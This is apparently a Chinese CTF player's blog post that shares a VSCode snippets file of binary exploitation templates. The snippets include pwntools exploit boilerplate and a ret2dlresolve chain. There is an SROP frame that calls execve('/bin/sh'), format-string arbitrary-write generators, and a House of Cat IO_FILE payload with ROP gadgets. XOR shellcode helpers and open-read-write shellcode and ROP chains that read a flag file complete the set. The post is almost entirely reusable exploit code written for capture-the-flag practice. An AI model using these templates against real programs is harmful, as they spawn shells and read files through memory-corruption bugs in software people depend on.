VSCode-Snippets配置

(Updated: )
Pwn

# 持续更新 ing... ...

# Origin...

之前打 OI 的时候接触了缺省源这个东西,现在打 CTF 的时候某些模板语句都懒得写,到别的文件去 Copy,但是这样无疑还能够压榨时间。于是想把高中 DEV-C++ 的缺省源类似的东西运用到 VSCode 编写 EXP 的过程里面,于是就有了今天这篇文章。
原来你也玩缺省源

# SourceCode

没啥好解释的,就是写一个 prefix 然后按下 tab 就能自动产生你设置的对应的代码段。这样既可以避免手搓代码导致的腱鞘炎,又可以节省 Copy 文件以及避免突然找不到模板文件的尴尬。
而且,编辑代码中的内容可以当成变量进行修改,这些变量只要在缺省源里面用 $1,$2 之类的进行代替,正式编写代码的时候,只需要按一下 Tab 就可以自动把光标跳转到下一个变量。
简直就是懒人福利
不说了直接粘贴代码。设置 Snippets 网上都有教程。
这里的缺省源都是根据我之前写的 EXP 里面摘抄过来的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
//python.json
{
	// Place your snippets for python here. Each snippet is defined under a snippet name and has a prefix, body and 
	// description. The prefix is what is used to trigger the snippet and the body will be expanded and inserted. Possible variables are:
	// $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders. Placeholders with the 
	// same ids are connected.
	// Example:
	"Exp-Standard":{
		"prefix": "exp-std",
		"body": [
			"# sudo sysctl -w kernel.randomize_va_space=0",
			"#coding=utf-8",
			"from pwn import *",
			"from socket import *",
			"from Crypto.Util.number import long_to_bytes,bytes_to_long",
			"context.terminal=['tmux','splitw','-h']\ncontext.arch='amd64'\ncontext.log_level='debug'\n",
			"global p",
			"global r",
			"ELFpath=''",
			"libcpath=''\n",
			"DEBUG=2",
			"PROCESS=1",
			"REMOTE=0\n",
			"run_mode=REMOTE",
			"socket_flag=False\n",
			"ELFpath='./$1' ",
			"e=ELF(ELFpath)",
			"os.chdir(ELFpath[:ELFpath.rfind('/')])\n",
			"libcpath='$2'",
			"if(libcpath!=\"\"):",
			"    libc=ELF(libcpath)\n\n",
			"start_script='''",
			"    b setbuf",
			"'''\n",
			"if(socket_flag==False):",
			"    if(run_mode==DEBUG):",
			"        p=gdb.debug(args=[ELFpath,start_script])",
			"    elif(run_mode==PROCESS):",
			"        p=process(argv=[ELFpath,'/home/jmpcliff/Desktop/httpd'])",
			"    elif(run_mode==REMOTE):",
			"        p=remote('',)\n",
			"else:",
			"    if(run_mode==DEBUG):",
			"        r=gdb.debug(ELFpath,start_script  )",
			"    elif(run_mode==PROCESS):",
			"        r=process(argv=[ELFpath,'/home/jmpcliff/Desktop/httpd'])",
			"    pause()",
			"    p=remote('127.0.0.1',6666)\n\n",
			"rut=lambda s :p.recvuntil(s,timeout=0.3)",
			"ru=lambda s :p.recvuntil(s)",
			"r=lambda n :p.recv(n)",
			"sl=lambda s :p.sendline(s)",
			"sls=lambda s :p.sendline(str(s))\n",
			"ss=lambda s :p.send(str(s))",
			"s=lambda s :p.send(s) ",
			"uu64=lambda data :u64   (data.ljust(8,'\\x00'))",
			"it=lambda :p.interactive()",
			"b=lambda :gdb.attach(p)",
			"bp=lambda bkp:gdb.attach(p,'b *'+str(bkp))",
			"get_leaked_libc = lambda :u64(ru(b'\\x7f')[-6:].ljust(8,b'\\x00'))\n",
			"LOGTOOL={}",
			"def LOGALL():",
			"    log.success(\"**** all result ****\")",
			"    for i in LOGTOOL.items():",
			"        log.success(\"%-20s%s\"%(i[0]+\":\",hex(i[1])))\n",
			"def get_base(a, text_name):",
			"    text_addr = 0",
			"    libc_base = 0",
			"    for name, addr in a.libs().items():",
			"        if text_name in name:",
			"            text_addr = addr",
			"        elif \"libc\" in name:",
			"            libc_base = addr ",
			"    return text_addr, libc_base",
			"def debug():",
			"    global p",
			"    global run_mode",
			"    if(run_mode!=PROCESS):",
			"        return",
			"    text_base, libc_base = get_base(p, 'challenge')",
			"    script = '''",
			"    set \\$text_base = {}",
			"    set \\$libc_base = {}",
			"    '''.format(text_base, libc_base)",
			"    if socket_flag==False:",
			"        gdb.attach(p, script)",
			"    else:",
			"        gdb.attach(r, script)\n",
			"def ptrxor(pos,ptr):",
			"    return p64((pos >> 12) ^ ptr)\n",
			"def create_link_map(l_addr,know_got,link_map_addr):",
			"    link_map=p64(l_addr & (2 ** 64 - 1))    ",
			"    #dyn_relplt",
			"    link_map+=p64(0)",
			"    link_map+=p64(link_map_addr+0x18)        #ptr2relplt",
			"    #relplt",
			"    link_map+=p64((know_got - l_addr)&(2**64-1))    ",
			"    link_map+=p64(0x7)",
			"    link_map+=p64(0)\n",
			"    #dyn_symtab",
			"    link_map+=p64(0)",
			"    link_map+=p64(know_got-0x8)\n",
			"    link_map+=b'/flag\\x00\\0\\x00'\n",
			"    link_map=link_map.ljust(0x68,b'B')\n",
			"    link_map+=p64(link_map_addr)        #ptr2dyn_strtab_addr",
			"    link_map+=p64(link_map_addr+0x30)        #ptr2dyn_symtab_addr\n",
			"    link_map=link_map.ljust(0xf8,b'C')\n",
			"    link_map+=p64(link_map_addr+0x8)        #ptr2dyn_relplt_addr",
			"    return link_map",
			"\n\n\n\n\n\ndebug()",
			"\n\n\n\n\n\nLOGALL()",
			"\n\n\n\n\n\nit()"
		],
		"description": "Init stacdard exp"
	},

	"Init EXP": {
		"prefix": "exp",
		"body": [
			"# sudo sysctl -w kernel.randomize_va_space=0",
			"from pwn import*",
			"from Crypto.Util.number import long_to_bytes,bytes_to_long",
			"",
			"context.log_level='debug'",
			"context(arch='amd64',os='linux')",
			"context.terminal=['tmux','splitw','-h']",
			"",
			"ELFpath = '$1'",
			"#p=remote(' ',)",
			"#p=process(['./ld-2.31.so', ELFpath], env={\"LD_PRELOAD\":'./libc-2.31.so'})",
			"p=process(ELFpath)",
			"gdb.attach(p)",
			"#elf=ELF(ELFpath)",
			"#libc=ELF('./libc.so.6')",
			"",
			"p.interactive()"
		],
		"description": "Init EXP"
	},
	"ret2dl_resolve": {
		"prefix": "dlresolve",
		"body": [
			"context.binary = elf = ELF('./dlre')",
			"rop = ROP(context.binary)",
			"dlresolve = Ret2dlresolvePayload(elf,symbol='system',args=['/bin/sh'])\t\t# pwntools will help us choose a proper addr",
			"rop.read(0,dlresolve.data_addr)\nrop.ret2dlresolve(dlresolve)\nraw_rop = rop.chain()\n",
			"payload = flat({0x$1:raw_rop,256:dlresolve.payload})",
			"p.sendline(payload)"
		],
		"description": "Template 0f ret2dl_resolve"
	},
	"SROP": {
		"prefix": "srop",
		"body": [
			"sigreturn= +p64(syscall)\t\t# sigreturn = p64(pop_rdi)+p64(0xf)+p64(0x401136)+p64(syscall)",
			"frame = SigreturnFrame()",
			"# 实现execve的系统调用\n# 需要存储在伪造的栈地址位置",
			"frame.rax = constants.SYS_execve\nframe.rdi = sh\nframe.rsi = 0\nframe.rdx = 0\nframe.rip = syscall\nstack_frame = b\"/bin/sh\\x00\"+sigreturn+bytes(frame)",
			"\n# 实现read的系统调用\n# 读取包括bin字符串和伪造的栈数据",
			"frame = SigreturnFrame()\nframe.rax = constants.SYS_read\nframe.rdi = 0\nframe.rsi = sh\nframe.rdx = 0x400\nframe.rip = syscall\nframe.rsp = sh+8  # 设置栈顶指针位置",
			"pad = cyclic(0x$1)\npad += sigreturn + bytes(frame)",
			"\n# 先发送实现read系统调用的pad",
			"p.send(pad)",
			"# read读取stack_frame\n# 然后ret到伪造的栈上执行execve系统调用",
			"p.send(stack_frame)"
		],
		"description": "Template 0f SROP"
	},
	"fmtstr-write-addr": {
		"prefix": "fmtstr-write-addr",
		"body": [
			"def take_first(elem:tuple):return elem[0]\n",
			"def splitw_6_byte(data):",
			"    result=[]",
			"    for i in range(6):",
			"        result.append((data&0xff,i))",
			"        data=data>>8",
			"    return result\n",
			"def fmt_write_addr(data:list,arg_num,addr,header=b\"\"):",
			"    data.sort(key=take_first)\n",
			"    for i in data:",
			"        print(str(i[0])+\" \"+str(i[1]))\n",
			"    fmt_1=''",
			"    for i in range(6):",
			"        if(i==0):",
			"            fmt_1+=\"%\"+str(data[i][0])+\"c\"",
			"        else:",
			"            fmt_1+=\"%\"+str(data[i][0]-data[i-1][0])+\"c\"",
			"        fmt_1+=\"%00\\$hhn\"",
			"    len_header=len(header)",
			"    fmt_1_len=len(fmt_1)+len(header)",
			"    if((fmt_1_len&0x7)!=0):",
			"        fmt_1_len=fmt_1_len&0xfffffff8",
			"        fmt_1_len+=8",
			"    arg_start=arg_num+fmt_1_len//8",
			"    fmt_1=b''",
			"    if(data[i][0]<len_header):",
			"        print(\"FMT ERROR: HEADER TOO LONG!!\")",
			"        exit()",
			"    for i in range(6):",
			"        if(data[i][0]!=len_header):",
			"            if(i==0):",
			"                fmt_1+=b\"%\"+str(data[i][0]-len_header).encode()+b\"c\"",
			"            else:",
			"                fmt_1+=b\"%\"+str(data[i][0]-data[i-1][0]).encode()+b\"c\"",
			"        else:",
			"            fmt_1+=b\"%0\"+str(arg_start).encode()+b\"\\$hhn\"",
			"        arg_start+=1",
			"    fmt_2=b''",
			"    for i in range(6):",
			"        fmt_2+=p64(addr+(data[i][1]))",
			"    fmt=(header+fmt_1).ljust(fmt_1_len,b'\\x00')+fmt_2",
			"    return fmt"
		],
		"description": "Functions to generate fmtstrings."
	},
	"Shellcode-Generate": {
		"prefix": "asmgen",
		"body": [
			"from Xhellcode import Xhellgen",
			"from XorHack import XorHack,process_hack",
			"rang=[$1] # ranges rang=[[0x10,0x20],[0x40,0x50]]",
			"Xhellgen(rang,True,$2) # need capstone to disasm     input length to brute-force"
		],
		"description": "Use Xhellgen.py to generate Shellcode (need capstone)"
	},
	"XorHack": {
		"prefix": "xorhack",
		"body": [
			"from Xhellcode import Xhellgen",
			"from XorHack import XorHack,process_hack",
			"rang=[$1] # ranges rang=[[0x10,0x20],[0x40,0x50]]\n",
			"# Xhellgen(rang,True,3) # need capstone to disasm     input length to brute-force\n",
			"shellcode='''",
			"'''",
			"arr=XorHack(shellcode,rang,b'\\x$2',$3)  # XorHack(shellcode,rang,(byte)padding,(int)length_of_a_part)\n",
			"# return a bytes\n",
			"# process_hack(b'\\x0f\\x05\\x00\\x00',rang,2) # hack bytes",
			"# process_hack(0xffffffff,rang,2) # hack numbers"
		],
		"description": "XorHack.py for Shellcode-Xor (need capstone)"
	},
	"House of Cat": {
		"prefix": "cat-payload",
		"body": [
			"ru(\"0x\")\nlibcbase=int(r(12),16)\nLOGTOOL['libcbase']=libcbase\n\nru(\"0x\")\nfake_io=int(r(12),16)\n",
			"LOGTOOL['fake_io']=fake_io   # chunk_start (prev_size)\n\nIO_file_jumps=libcbase+0x216600\nLOGTOOL[\"IO_file_jump\"]=IO_file_jumps",
			"\n\nIO_wfile_jumps=libcbase+0x2160C0\nLOGTOOL[\"IO_wfile_jumps\"]=IO_wfile_jumps\n\nexecve_addr=libcbase+0xeb080\nLOGTOOL['execve']=execve_addr",
			"\n\nsetcontext_61=libcbase+0x539E0+61\nLOGTOOL['setcontext_61']=setcontext_61\n\nlr=libcbase+0x4da83\nret=libcbase+0x29139\npop_rdi=libcbase+0x2a3e5 \npop_rsi=libcbase+0x002be51\npop_rdx=libcbase+0x0796a2 ",
			"\n\nrop=b'/bin/sh\\x00'\n\npay=flat(\n{\n0x30:[p64(0),p64(0),p64(0),p64(1),p64(fake_io+0x138)],  # wide_data\n0x88:p64(fake_io+0x1e8),",
			"\n0xa0:[p64(fake_io+0x30)],\n0xc0:[p64(1)],   #_mode\n0xd8:[p64(IO_wfile_jumps+0x30)],    # vtable\n0x110:[p64(fake_io+0x118)], # wide_data -> vtable",
			"\n\n0x118:flat(\n{\n0x18:[p64(setcontext_61)]\n},filler=b'\\x00'\n),\n\n0x138:flat(\n{\n0x68:p64(fake_io+0x1e8),    # rdi \n0x70:p64(0),                # rsi\n0x88:p64(0),                # rdx",
			"\n0xa0:p64(fake_io+0x1f8),    # rsp\n0xa8:p64(ret)       # ret_addr\n},filler=b'\\x00'\n),\n\n0x1e8:flat(\n{\n0x00:p64(0)+p64(0),\n0x10:rop",
			"\n},filler=b'\\x00'\n)\n\n\n},filler=b'\\x00'\n)\ns(pay[0x10:])"
		],
		"description": "Payload template of House of Cat.(IO_FILE)"
	},
	"fmt_payload": {
		"prefix": "fmtstr",
		"body": [
			"fmtstr_payload(offset,{addr:val})"
		],
		"description": "fmtstr_payload(offset,{addr:val})"
	},
	"ORW-Shellcode0": {
		"prefix": "orwshellcode0",
		"body": ["shellcode='''\nmov  rax,257\nmov rdi ,-100\nmov rsi,0x1145141f8\nmov rdx,0\nmov r8,0x100\nsyscall\n\nmov rdi, 1\nmov rsi, 3\npush 0\nmov rdx, rsp\nmov r10, 0x100\npush SYS_sendfile\npop rax\nsyscall\n\nmov rax,60\nmov rdi,0\nsyscall\n'''"],
		"description": "openat+sendfile"
	},
	"ORW-Payload0": {
		"prefix": "orwpayload0",
		"body": ["p64(pop_rdi)+p64(name)+p64(pop_rsi)+p64(0)+p64(open64)+p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(name-0x100)+p64(pop_rdx2)+p64(0x100)+p64(0x0)+p64(read_a)+p64(pop_rdi)+p64(name-0x100)+p64(puts)"],
		"description": "open64+read+puts"
	},
	"ORW-Payload1": {
		"prefix": "orwpayload1",
		"body": ["paylaod=b'./flag\\x00\\x00'+p64(pop_rax)+p64(2)+p64(pop_rdi)+p64(newbuf)+p64(pop_rsi)+p64(0)+p64(syscall)+p64(pop_rdi)+p64(newbuf-0x100)+p64(puts)  +p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(3)+p64(pop_rax)+p64(40)+p64(pop_rdx)+p64(0)+p64(syscall)+p64(0x0401433)"],
		"description": "syscall:open,sendfile"
	}
}